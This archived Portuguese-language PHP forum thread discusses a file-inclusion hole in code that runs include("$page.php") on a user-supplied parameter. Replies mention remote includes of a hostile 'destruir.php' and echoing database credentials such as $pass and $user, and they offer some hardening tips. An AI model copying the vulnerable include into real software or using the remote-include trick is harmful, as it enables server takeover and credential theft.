Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

d4rk_sp1r1t

Bug no php

Por , em PHP

Recommended Posts

d4rk_sp1r1t    0

d4rk_sp1r1t
Postado

<?php if(isset($page)) { include ("$page.php")com esse codigo um atacante pode usar uma url depois do ?page= com um code em php emulando a shell do sistema e tendo acesso ao sistemaalguem tem um code similar e com a mesma funcao? como corrigir o problema?

Compartilhar este post

Link para o post
Compartilhar em outros sites

rockbilly    0

rockbilly
Postado

<?php if(isset($page)) { include ("$page.php")

mas antes de tudo o atacante teria que ter acesso a máquina para transformar (page.php) em ($page.php)!? Enfim... vamos discutir sobre isso afim de q possamos evitar tal coisa.

Compartilhar este post

Link para o post
Compartilhar em outros sites

rodurma    0

rodurma
Postado

bom neste caso usaria só o page como string ai no código php adcionava o .php.Pelo que sei da pra você fazer include("http://www.site.com.br/destruir.php");Muita gente tb usa uma sub pasta /include para colocar arquivos do tipo "arquivo.inc". Pessoal já sabe que isso não é bom pq inc não é interpretado pelo servidor ou seja vem texto puro.Tem tb gente que coloca dentro da pasta include arquivos com o nome conecta.php onde faz conexao com o mysql e a chance de ter variáveis com o nome $pass $db $user etc etc é grande.Imagina se o cara usa assiminclude("http://www.seusite.com.br/include/conecta.php");echo $pass;echo $user;echo $db;Eu recomendaria não usar nomes desse tipo nos seus arquivos e variáveis ou ver uma maneira de proteger esse diretório include (se possivel nem colocar include no nome do diretório)Falo ae

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos PHP
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito